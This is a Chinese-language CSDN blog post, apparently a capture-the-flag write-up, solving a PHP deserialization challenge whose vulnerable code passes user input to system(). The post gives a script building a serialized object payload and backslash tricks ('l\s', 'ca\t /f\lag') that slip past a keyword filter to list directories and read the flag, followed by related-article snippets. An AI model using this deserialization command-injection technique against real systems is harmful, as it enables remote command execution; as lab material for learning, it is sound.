cs反序列化1

最新推荐文章于 2022-10-22 18:23:49 发布
最新推荐文章于 2022-10-22 18:23:49 发布
阅读量98 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113352583
版权

cs反序列化1

http://111.229.84.70:9997/

参考:https://www.cnblogs.com/Jim2g/articles/13641685.html

llinux命令:https://wenwen.sogou.com/z/q797390881.htm?rcer=g9PEmO6OUhz-HfDog

<?php
error_reporting(0);
highlight_file(__FILE__);
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;
    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        echo "your file is ".$this->file;
    }

}
class Human{
    public $a;
    public function __construct($a){
        $this->a = $a;

    }
    public function __toString()
    {
        if(preg_match('/ls|cat|more|flag/i',$this->a)){
        // TODO: Implement __toString() method.
            
            die('姿势骚一点');
        }
        else{
            system($this->a);
        }
        return ("good");
    }
}


$a = $_GET['code'];
unserialize($a);
?>

关键在system,所以要改变a的值

$a要反序列化

正则匹配的用\绕过

<?php
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;

}
class Human{
    public $a;
}
$n=new person();
$n->file=new human();
$n->file->a='l\s ../../../../';
$c=serialize($n);
echo $c;

run:O:6:"Person":3:{s:8:"username";s:6:"peguin";s:8:"password";s:6:"123456";s:4:"file";O:5:"Human":1:{s:1:"a";s:16:"l\s ../../../../";}}

bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

根目录下有个flag文件

$n->file->a='ca\t /f\lag';
切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
05-09
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
C# xml序列化反序列化
01-05
在C#编程中,XML序列化反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
来自CS序列化的类
weixin_30244681的博客
04-30 73
来自CS序列化的类 usingSystem;usingSystem.Collections.Specialized;usingSystem.Globalization;usingSystem.IO;usingSystem.Runtime.Serialization;usingSystem.Runtime.Serialization...
【Java框架】CSFreamwork:参数序列化
YunSu_CJ的博客
12-27 368
客户端请求资源,如何发送参数? 数据发送,可以是字符串或者字节数据,那么如何发送整型、浮点型、对象等数据。有一种方式是将数据格式化,转换成字符串或字节类型发送,对端接收后,将其还原成源数据。 什么是序列化序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。 Gson工具 Gson 是 Google 提供的用来在 Java 对象和 JSON 数据之间进行映射的 Java 类库。可以将一个 JSON 字符串转成一个 Java 对象。 ArgumentMaker 小工具
C# 三种序列化
小小的花园里面挖呀挖呀~
08-25 674
Binary 引用 using System.Runtime.Serialization.Formatters.Binary; \\User.cs [Serializable] public class User { public string UserName { get; set; } public string Password {
cs反序列化2
missht0的博客
01-28 130
cs反序列化2 http://111.229.84.70:9998/ <?php highlight_file(__FILE__); class HZNU{ private $username; private $password; public function __construct($user,$pass){ $this->username=$user; $this->password=$pass; }
C# Xml序列化反序列化Dictionary
闪耀星星的窝
04-08 1469
做奇门对接时,extendProp字段是一个Map类型 C# 序列化xml时字典类型不支持 ExtendProp.cs using System; using System.Collections.Generic; using System.Xml; using System.Xml.Schema; using System.Xml.Serialization; namespace Qimen.Api { public class ExtendProp : Dictionary<st
ctfshow 反序列化
..
03-07 3288
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
PHP反序列化
L0g1c的博客
10-22 1183
反序列是指把对象转换为字符串的过程,便于在内存、文件、数据库中保存、传输,PHP中使用serialize函数进行序列化。 运行结果为 各个字符的意义:字母O代表Object,a代表array,s代表string,i 表示数字 O代表Object对象,6代表类名(Person)的长度是6,3代表类中的属性有3个。{}内就是类的属性信息,每个属性以分号;结束。 s代表string类型,4代表属性名(name)的长度,name后面是属性值,string类型,数值长度为3,数值为php。若类属性值未初始化,则默认值
Python反序列化免杀上线CS
qq_57686163的博客
08-20 797
简单免杀上线cs
CTFshow-WEB入门-反序列化
feng的博客
02-14 5506
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
XML序列化反序列化 实战
08-16
XML序列化反序列化是.NET框架中处理数据交换的重要技术,它允许我们将对象的状态转换为XML格式的数据,也可以将XML数据恢复为等效的对象。这个实战项目专注于使用C#实现这一过程,使得开发者能够方便地在XML文件和...
C# 序列化-反序列化.cs
09-06
C# 序列化-反序列化.cs
C# 序列化反序列化
04-15
在C#编程中,序列化反序列化是两个关键的概念,它们主要用于数据持久化、网络传输或跨进程通信。序列化是将对象的状态转换为可存储或可传输的形式,而反序列化则是将这种形式的数据恢复为原来的对象。本主题主要...
C#protobuf3的序列化反序列化和protobuf3转换cs文件的小工具
weixin_39637610的博客
07-23 5639
C#protobuf3的序列化反序列化和protobuf3转换cs文件的小工具
尚品汇项目思维导图 根据思维导图进行复习
07-13
尚品汇项目思维导图 根据思维导图进行复习
全网最热Python3入门+进阶 更快上手实际开发
07-13
网最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示“组”的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
Go:Go语言项目实战教程
07-14
Go:Go语言项目实战教程
反恐精英游戏CS1.6安装好后界面看不到菜单,改中文,并调整分辨率
最新发布
07-14
反恐精英游戏CS1.6安装后,很多人打开后界面是看不到菜单的,一般是因为分辨率不对,将这个.reg导入即可完成设置。 下载完成后,双击运行该文件,按照提示进行操作。在导入过程中,可能会出现警告信息,点击“是”或“确定”继续。 导入成功后,重新启动CS1.6游戏,你会发现界面已经调整为正确的分辨率,菜单也能够正常显示了。这样,你就可以愉快地享受游戏了。
c# protobuf序列化
09-07
6. 如果要将字节数组反序列化回消息对象,可以使用解析器类: ```csharp Person deserializedPerson = Person.Parser.ParseFrom(data); ``` 现在,您可以使用deserializedPerson对象访问反序列化后的数据。 这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值